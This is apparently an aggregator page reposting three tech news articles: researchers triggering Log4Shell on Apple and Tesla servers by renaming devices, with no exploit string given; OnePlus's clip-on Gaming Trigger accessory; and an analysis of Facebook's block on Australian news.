Researchers trigger new exploit by renaming an iPhone and a Tesla

Security researchers investigating the recently discovered and “extremely bad” Log4Shell exploit claim to have used it on devices as varied as iPhones and Tesla cars. Per screenshots shared online, changing the device name of an iPhone or Tesla to a special exploit string was enough to trigger a ping from Apple or Tesla servers, indicating that the server at the other end was vulnerable to Log4Shell.

In the demonstrations, researchers switched the device names to be a string of characters that would send servers to a testing URL, exploiting the behavior enabled by the vulnerability. After the name was changed, incoming traffic showed URL requests from IP addresses belonging to Apple and, in the case of Tesla, China Unicom — the company’s mobile service partner for the Chinese market. In short, the researchers tricked Apple and Tesla servers into visiting a URL of their choice.

Apple device information screen showing name changed to log4shell attack string

An iPhone device information screen with name changed to contain the exploit string.
Image: Cas van Cooten / Twitter

The iPhone demonstration came from a Dutch security researcher; the other was uploaded to the anonymous Log4jAttackSurface Github repository.

Assuming the images are genuine, they show behavior — remote resource loading — that should not be possible with text contained in a device name. This proof of concept has led to widespread reporting that Apple and Tesla are vulnerable to the exploit.

While the demonstration is alarming, it’s not clear how useful it would be for cybercriminals. In theory, an attacker could host malicious code at the target URL in order to infect vulnerable servers, but a well-maintained network could prevent such an attack at the network level. More broadly, there’s no indication that the method could lead to any broader compromise of Apple or Tesla’s systems. (Neither company responded to an email request for comment by time of publication.)

Still, it’s a reminder of the complex nature of technological systems, which almost always depend on code pulled in from third-party libraries. The Log4Shell exploit affects an open-source Java tool called log4j which is widely used for application event logging; though it’s still not known exactly how many devices are affected, but researchers estimate that it is in the millions, including obscure systems that are rarely targeted by attacks of this nature.

The full extent of exploitation in the wild is unknown, but in a blog post, digital forensics platform Cado reported detecting servers trying to use this method to install Mirai botnet code.

Log4Shell is all the more serious for being relatively easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource, and trying to retrieve that resource instead of saving the text as it is written. All that’s necessary is for a vulnerable device to save the special string of characters in its application logs.

This creates the potential for vulnerability in many systems that accept user input, since message text can be stored in the logs. The log4j vulnerability was first spotted in Minecraft servers, which attackers could compromise using chat messages; and systems that send and receive other message formats like SMS clearly are also susceptible.

At least one major SMS provider appears to be vulnerable to the exploit, according to testing conducted by The Verge. When sent to numbers operated by the SMS provider, text messages containing exploit code triggered a response from the company’s servers that revealed information about the IP address and host name, suggesting that the servers could be tricked into executing malicious code. Calls and emails to the affected company had not been answered at time of publication.

An update to the log4j library has been released to mitigate against the vulnerability, but patching of all vulnerable machines will take time given the challenges of updating enterprise software at scale.

Repost: Original Source and Author Link


OnePlus Gaming Trigger may confuse your senses

Today we witnessed the first reveal of the OnePlus 9, OnePlus 9 Pro, and the OnePlus Watch, AND a new accessory. The accessory was called OnePlus Gaming Trigger, and it was made for the whole OnePlus 9 family of devices. It’s a sort of clip and a button, made to allow the user to turn their digital experience into a slightly more… tactile experience.

“For gamers, we’re also introducing a brand new OnePlus Gaming Trigger with capacitive sensing technology,” said OnePlus Head of Corporate Communications Ryan Fenwick. “Simply snap on one or both of the triggers to upgrade your mobile gaming experience.”

They clip on to any one of the several OnePlus 9 models revealed today. It would appear that they’ll require that you’re either using no protective case or one of the OnePlus cases that are relatively thin – they clip right on to the edge of the phone.

“They’re not just beautiful to look at, they also provide a more tactile gaming experience,” said OnePlus Head of Campaigns, Tilen Pigac. “Just clip them on those beautiful corners and you have two extra buttons for that physical trigger experience.”

It’s not yet clear if they’ll work with any game (with buttons in the upper right and left of the screen) or if they’ll require some sort of developer input to function. In any case, it does not seem that they’ll require any sort of power source. These are all about mechanical input – back to basics!

Neither release date nor price was revealed for the OnePlus Gaming Trigger (or Triggers). Stay tuned as we learn more about these oddities for the OnePlus 9 collection. And tap the timeline below to learn more about the OnePlus 9, 9 Pro, and OnePlus Watch.

Repost: Original Source and Author Link

Tech News

Facebook pulled the trigger on Australian news — and shot itself in the foot

Facebook today made good on its threat to block Australians from accessing or posting news content. The ban includes blocking links to Australian and overseas news publishers.

Facebook said the ban was a direct response to the federal government’s news media code legislation, which is expected to become law soon and would require digital platforms such as Facebook and Google to pay news media companies whose content they host.

Why has Facebook done this?

The move is either a last-ditch attempt to gain concessions in the legislation or a simple cut-and-run by Facebook.

The social media giant claims news publishers derive more value from news sharing than Facebook does. This is plausible, as news content makes up only 4% of sharing on the platform, whereas many news sites gain a large fraction of their traffic from Facebook referrals.

But this is probably more about flexing some muscle. Facebook may be demonstrating to the Federal government that if it doesn’t like the rules, it can damage national interests.

[Read: How do you build a pet-friendly gadget? We asked experts and animal owners]

Collateral damage

Australians will feel some short-term negative impacts of Facebook’s flex.

Certain government Facebook pages, such as those belonging to the Bureau of Meterology and some health department sites, have been caught up in the ban. Facebook says this is due to the wording of the legislation, stating:

As the law does not provide clear guidance on the definition of news content, we have taken a broad definition in order to respect the law as drafted.

While Facebook says it will restore non-news pages, the action will put pressure on the government to define more clearly what it means by news content.

In the meantime, the move will affect Australians’ access to vital information related to emergencies and the COVID-19 pandemic. Without a concerted effort to ensure online behavior change from users, this could be dangerous.

Misinformation risk

We can also expect to see a short-term proliferation of misinformation as Facebook’s news feed will have a vacuum of professionally sourced and fact-checked news.

A significant number of Australians discuss news on Facebook, both via their newsfeed and in groups. Being able to source factual information from news sites is part of the everyday political and social participation that social media platforms facilitate.

The democratic impact of Facebook’s ban will be felt – and is counter to Facebook’s stated principle of connecting people and its recent pledge to tackle misinformation.

Will it hurt Facebook?

The impact of this action against the legislation on Facebook itself is yet to be seen.

The reputational damage from blocking important sites that serve Australia’s public interest overnight – and yet taking years to get on top of user privacy breaches and misinformation – undermines the legitimacy of the platform and its claimed civic intentions.

Facebook’s actions may send a message to the government, but they will also send one to their Australian users.

Readers are likely to find other ways to get their news. If we learn from the experience of Google’s news ban in Spain, we can see that after an initial dip in traffic, most major news organizations in Spain regained much of their web traffic after about a year.

Surfing social waves

Tools such as Facebook are only useful if people want to use them. And for some existing users, the lack of news might be a dealbreaker.

Facebook already faces a long-term problem of an aging user demographic, as under-25s turn to Instagram, Snapchat, and TikTok for news and information.

Young people may have Facebook profiles, but they are less likely to be active users.

News organizations are already following their lead. For example, The Conversation Australia has 325,735 Facebook followers and will probably feel the impact of the loss of engagement there.

But it also has more than 21,000 Instagram followers and counting. It is increasingly making visual news “tiles” to cater to the younger demographic of users who source news from other platforms. It has also been working to reach readers directly via regular email newsletters, which one in five US readers now say is their primary way of accessing news.

News organizations have already learned how to pivot fast. When Facebook changed its algorithms in 2018 to deprioritize news publishers, many took action to reduce their reliance on Facebook’s traffic, analytics, or digital advertising dollars.

What now?

Larger news organizations will be OK in the long run. But Australia’s smaller outlets, including local publishers and non-profits that produce public-interest journalism, will need protection.

The long-term task for news organizations and journalists is to convince the public – especially young people – that it’s worthwhile to actively seek out professional news and journalism as part of their daily online lives, rather than simply reading whatever comes across their feed.

As for Facebook, going back to its original purpose of facilitating personal connection and social networking, rather than posing as a forum for public information, may not be a bad thing. But the reputational damage and publisher exodus will eventually damage its core business: digital advertising revenue.

This article by Diana Bossio, Lecturer, Media and Communications, Swinburne University of Technology is republished from The Conversation under a Creative Commons license. Read the original article.

Repost: Original Source and Author Link